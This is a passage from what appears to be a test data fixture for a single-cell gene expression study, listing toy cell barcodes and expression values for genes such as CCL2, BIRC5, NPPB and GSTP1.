"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PON1 Expression": {
"name": "PON1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
3.0,
2.0,
3.0,
1.0,
2.32,
1.58,
3.0,
2.58,
1.58,
1.0,
1.0,
2.81,
3.0,
2.0,
1.58,
1.58,
1.58,
2.32,
2.81,
2.32,
1.0,
2.81,
1.0,
2.0,
2.0,
2.58,
1.0,
3.0,
1.0,
2.0,
2.32,
2.0,
2.32,
2.58,
1.58,
3.0,
2.32,
2.81,
2.58,
1.0,
2.0,
2.0,
2.81,
2.0,
2.0,
2.58,
2.81,
2.32,
2.0,
2.32,
3.0,
2.32,
1.58,
1.58,
1.58,
3.0,
2.0,
1.58,
2.81,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCL2 Cells": {
"name": "CCL2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CCL2 Expression": {
"name": "CCL2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
1.58,
2.0,
1.58,
1.0,
1.0,
3.0,
2.0,
1.58,
2.0,
2.58,
1.0,
1.58,
2.32,
2.58,
2.0,
2.58,
2.0,
2.81,
3.0,
1.58,
3.0,
3.0,
2.0,
1.58,
1.0,
1.58,
2.32,
2.58,
1.58,
3.0,
1.0,
3.0,
1.0,
1.58,
2.58,
2.58,
2.32,
3.0,
1.58,
3.0,
2.0,
1.0,
1.58,
2.58,
1.0,
1.58,
1.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BIRC5 Cells": {
"name": "BIRC5 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BIRC5 Expression": {
"name": "BIRC5 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.81,
2.32,
2.58,
2.81,
1.58,
2.58,
1.0,
2.0,
3.0,
2.0,
3.0,
2.32,
3.0,
1.0,
2.0,
3.0,
2.58,
2.58,
2.0,
1.58,
1.58,
3.0,
2.32,
2.32,
2.32,
1.58,
2.0,
2.0,
2.81,
2.32,
2.32,
1.58,
2.32,
2.58,
2.58,
2.0,
2.81,
1.0,
1.58,
2.81,
2.0,
2.0,
2.58,
2.81,
2.32,
2.32,
2.81,
2.81,
1.0,
2.0,
1.58,
2.32,
1.58,
2.0,
2.58,
3.0,
2.58,
2.58,
3.0,
2.32,
1.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NPPB Cells": {
"name": "NPPB Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NPPB Expression": {
"name": "NPPB Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.81,
3.0,
1.0,
1.0,
2.58,
2.32,
2.81,
2.0,
1.58,
2.81,
2.32,
2.81,
2.32,
2.81,
1.0,
3.0,
2.81,
2.0,
2.58,
2.81,
3.0,
2.81,
2.32,
2.0,
3.0,
2.81,
2.81,
3.0,
2.81,
1.0,
2.0,
2.32,
2.58,
1.0,
2.58,
2.58,
2.81,
3.0,
3.0,
2.0,
2.32,
2.81,
1.0,
2.58,
3.0,
1.0,
3.0,
2.81,
2.32,
2.32,
2.32,
3.0,
2.58,
2.81,
1.58,
1.0,
3.0,
2.58,
2.0,
2.32,
2.32,
3.0,
2.81,
3.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F2 Cells": {
"name": "F2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"F2 Expression": {
"name": "F2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.58,
2.0,
2.0,
2.58,
1.0,
2.32,
2.58,
1.0,
2.58,
2.81,
1.58,
2.32,
1.0,
2.32,
1.58,
1.0,
2.0,
3.0,
2.32,
1.0,
1.0,
1.0,
1.0,
1.0,
2.58,
1.58,
1.58,
2.58,
3.0,
2.32,
1.58,
2.58,
1.0,
1.0,
3.0,
2.0,
1.0,
3.0,
2.32,
2.81,
1.0,
2.32,
1.0,
1.0,
2.58,
2.58,
1.58,
2.58,
2.81,
3.0,
2.0,
2.58,
1.0,
2.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTP1 Cells": {
"name": "GSTP1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTP1 Expression": {
"name": "GSTP1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.0,
1.58,
2.81,
1.58,
1.58,
1.0,
2.32,
1.0,
3.0,
3.0,
2.0,
2.58,
2.0,
2.81,
1.0,
2.32,
2.32,
3.0,
2.81,
2.32,
2.32,
2.32,
3.0,
2.58,
2.0,
2.32,
3.0,
2.81,
3.0,
2.81,
2.58,
2.58,
2.32,
3.0,
2.58,
2.32,
1.58,
2.81,
2.0,
2.81,
2.58,
1.58,
2.32,
2.32,
2.81,
3.0,
3.0,
1.58,
2.81,
2.58,
3.0,
2.58,
2.58,
2.0,
1.0,
2.0,
2.32,
1.0,
3.0,
3.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PIK3CA Cells": {
"name": "PIK3CA Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
